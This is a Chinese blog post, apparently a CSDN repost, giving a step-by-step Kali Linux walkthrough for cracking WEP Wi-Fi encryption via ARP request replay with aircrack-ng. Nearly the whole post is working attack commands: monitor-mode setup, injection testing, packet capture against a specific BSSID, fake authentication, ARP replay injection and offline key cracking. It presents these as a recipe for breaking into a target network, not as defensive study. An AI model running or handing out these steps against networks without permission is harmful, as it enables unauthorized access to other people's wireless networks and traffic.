kali:加速WEP黑客攻击,ARP请求重播攻击

简介: 版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396280 ...
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396280

参考文章

1、检查网卡支持

airmon-ng start wlan0 [或wlan1]

airserv-ng -d mon0  #开启监听模式
aireplay-ng -9 127.0.0.1:666 #尝试注入服务器

2、检查信号强度

airodump-ng mon0来查看范围内的网络列表
收集有效信息:

ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH(通道) - 2
连接到网络的正版用户的Mac地址:
接口:wlan1 - 简称mon0

至少一个用户去连接到网络,产生ARP请求包,我们才能进行攻击。

aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0   #对目标网络测试```
![image.png](http://upload-images.jianshu.io/upload_images/5145235-ebd9c9934f73b828.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)


```airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0 #捕获数据包```

>伪造身份验证

```aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0```

![认证和捕获数据包](http://upload-images.jianshu.io/upload_images/5145235-4243a569067b0953.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

##ARP请求重播模式
ARP数据包是获取大量IV或数据的最佳选择。没有IVs,你不能hack网络
```aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0  #使aireplay-ng收听AP的ARP数据包,并在找到它们后立即注入。这样会很快创建大量的数据```  
##破解网络
```aircrack-ng dump-01.cap```


相关文章
|
6月前
|
网络协议
网络攻击-arp攻击
网络攻击-arp攻击
83 0
|
网络协议 Linux
网络协议与攻击模拟-04-实施ARP攻击与欺骗
网络协议与攻击模拟-04-实施ARP攻击与欺骗
116 1
网络协议与攻击模拟-04-实施ARP攻击与欺骗
|
3月前
|
网络协议
卧槽!放个假,交换机受到ARP攻击了,怎么破?
卧槽!放个假,交换机受到ARP攻击了,怎么破?
|
3月前
|
网络协议 网络虚拟化
遇到ARP欺骗攻击,咋整?别慌!这3招教制服它!
遇到ARP欺骗攻击,咋整?别慌!这3招教制服它!
189 0
|
5月前
|
存储 缓存 网络协议
ARP欺骗与攻击原理
ARP欺骗与攻击原理
164 0
|
6月前
|
缓存 监控 网络协议
面对ARP攻击,怎么做好主机安全,受到ARP攻击有哪些解决方案
ARP攻击的具体原理主要是基于ARP(Address Resolution Protocol,地址解析协议)的漏洞进行欺骗和攻击。ARP协议是TCP/IP协议族中的一个重要协议,用于实现IP地址到MAC地址的映射。然而,由于ARP协议在设计时缺乏必要的安全验证机制,使得攻击者有机会进行欺骗和攻击。
|
网络协议 Linux 网络安全
Kali Linux中的ARP欺骗攻击如何进行
Kali Linux中的ARP欺骗攻击如何进行
375 0
|
缓存 监控 网络协议
防御ARP攻击和ARP欺骗并查找攻击主机
防御ARP攻击和ARP欺骗并查找攻击主机
469 0
|
监控 网络协议 安全
分析ARP攻击与欺骗
分析ARP攻击与欺骗
253 0
|
缓存 网络协议 安全
ARP攻击和欺骗原理讲解
ARP攻击和欺骗原理讲解
269 0